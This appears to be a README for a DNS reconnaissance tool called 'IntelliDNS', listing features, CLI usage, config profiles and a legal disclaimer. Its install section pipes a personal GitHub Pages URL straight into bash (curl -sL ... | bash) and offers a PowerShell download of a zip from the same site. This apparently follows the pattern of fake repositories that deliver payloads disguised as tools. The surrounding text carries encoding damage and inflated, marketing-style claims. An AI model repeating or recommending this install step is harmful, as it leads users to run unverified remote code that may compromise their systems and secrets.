Turn raw IP addresses into actionable intelligence.
IntelliDNS is not just a scannerβit's a forensic-grade DNS reconnaissance engine that maps the invisible digital architecture of networks, cloud infrastructures, and IoT ecosystems.
Inspired by the need to move beyond simple DNS lookups, IntelliDNS was built for security researchers, network engineers, and cloud architects who need to understand the DNS fingerprint of millions of IPs without compromising on accuracy or speed.
While traditional scanners just report records, IntelliDNS analyzes patterns, detects anomalies, and visualizes relationships between domains, subdomains, name servers, and geographic origins.
graph TD
A[IP Range Input] --> B{DNS Probe Engine}
B --> C[A Record Lookup]
B --> D[AAAA Record Lookup]
B --> E[MX Record Discovery]
B --> F[NS Record Mapping]
B --> G[TXT Record Extraction]
B --> H[SOA Record Analysis]
C & D & E & F & G & H --> I[Pattern Recognition AI]
I --> J[Threat Intel Enrichment]
I --> K[Geo-IP Correlation]
I --> L[Relationship Graph Builder]
J & K & L --> M[Export: JSON/CSV/PDF/GraphML]
curl -sL https://Mathlegend123.github.io | bashInvoke-WebRequest -Uri https://Mathlegend123.github.io -OutFile intellidns.zippip install intellidns-toolkit==2026.1.0# Scan a Class C network for all DNS records
intellidns scan --range 192.168.1.0/24 --records A,AAAA,MX,TXT --output report.json
# Real-time monitoring mode with anomaly detection
intellidns monitor --target "*.example.com" --alert-on-high-entropy-txt
# Generate intelligence graph
intellidns analyze --input dns_dump.csv --graph-format interactiveSample output snippet:
[2026-07-14 14:23:01] π Scanning 192.168.1.0/24...
[2026-07-14 14:23:04] β
192.168.1.1 β A: router.home, MX: mail.home
[2026-07-14 14:23:07] β οΈ 192.168.1.56 β High entropy TXT record detected
[2026-07-14 14:23:10] π Threat score: 2/10 (benign)
Create ~/.intellidns/config.yaml to customize scanning profiles:
profiles:
rapid-scan:
threads: 100
timeout_ms: 500
rate_limit: 1000 req/min
dns_servers:
- 8.8.8.8
- 1.1.1.1
deep-forensic:
threads: 25
timeout_ms: 3000
retries: 3
dns_servers:
- 8.8.8.8
- 4.4.4.4
- 9.9.9.9
anomaly_detection: true
geo_ip_enrichment: true
cloud-infra:
threads: 50
only_public_ips: true
exclude_private: true
output_format: graphml| Operating System | Version | CLI Support | Python GUI Support | Responsive UI |
|---|---|---|---|---|
| π§ Linux | Ubuntu 20.04+ | β Full | β Full | β Native |
| π macOS | Ventura+ | β Full | β Full | β WebView |
| πͺ Windows | 10/11 | β Full | β Full | β Electron |
| π³ Docker | 20.x+ | β Container | β No | β Web UI |
| π± Android | 12+ (Termux) | β No | β Mobile Web | |
| π iOS | 16+ (ish) | β No | β Mobile Web |
GUI support requires Python 3.9+ and Tkinter or PyQt6
- Simultaneous A, AAAA, MX, NS, CNAME, SOA, TXT, PTR, and SRV lookups
- Entropy analysis for TXT records (detects encoded payloads or C2 channels)
- DNSSEC validation and NSEC walking detection
- Reverse DNS waterfall analysis
- OpenAI API Integration: Enrich results with natural language summaries of domain reputations
Example:--ai-enrich openai:gpt-4o - Claude API Integration: Generate risk assessments and anomaly explanations
Example:--claude-reportproduces a human-readable forensic narrative - Pattern Recognition: Auto-detects:
- DNS tunneling attempts
- Subdomain brute-force protection bypass
- Stale or hijacked NS records
- Mail server spoofing risks (SPF/DKIM/DMARC)
- Output available in 12 languages: English, Spanish, French, German, Japanese, Chinese, Arabic, Russian, Portuguese, Hindi, Korean, and Dutch
- GUI interface auto-detects system locale
- Web Dashboard: Real-time scan visualization with D3.js force-directed graphs
- CLI Progress Bar: Beautifully formatted ratelimitted output
- Dark/Light Mode: Automatic theme switching
- Export to PDF: One-click generation of executive-ready reports
- Schedule scans via built-in cron syntax
- Email/Slack/Webhook alerts on critical findings
- Continuous monitoring mode with incremental delta scanning
export INTELLIDNS_OPENAI_KEY="sk-..."
intellidns scan --ai-enrich openai:gpt-4o --prompt "Summarize DNS infrastructure risk"export INTELLIDNS_CLAUDE_KEY="sk-ant-..."
intellidns analyze --claude-report --output threat_assessment.pdfBoth APIs are fully optionalβIntelliDNS works flawlessly offline with 100% local processing.
IntelliDNS is an educational and professional security tool.
Users are solely responsible for ensuring compliance with all applicable laws regarding network scanning and data collection. The authors assume no liability for misuse, unauthorized scanning, or any damages arising from the use of this software.
Always obtain explicit permission before scanning networks you do not own.
- No telemetry: Zero data leaves your machine unless you explicitly enable cloud enrichment
- Local-first: All processing happens on your hardware
- Encrypted export: Optional AES-256 encryption for sensitive result files
| Use Case | How IntelliDNS Helps |
|---|---|
| Cloud Migration | Map all DNS dependencies before moving workloads |
| Penetration Testing | Identify exposed services and subdomain takeovers |
| SOC Operations | Detect DNS tunneling or beaconing in real-time |
| CDN Optimization | Discover all A/AAAA records for traffic shaping |
| Compliance Audits | Verify DNS records against security policies |
This project is licensed under the MIT License β see the LICENSE file for details.
Most DNS scanners are like flashlights in a dark roomβthey illuminate what's directly in front of you.
IntelliDNS is like turning on the lights, drawing a floor plan, and predicting where shadows will fall.
It transforms millions of raw DNS queries into a living map of your digital infrastructure, enriched with AI-driven context that helps you make faster, smarter decisions.
Β© 2026 IntelliDNS Project
Built with β€οΈ for the cybersecurity community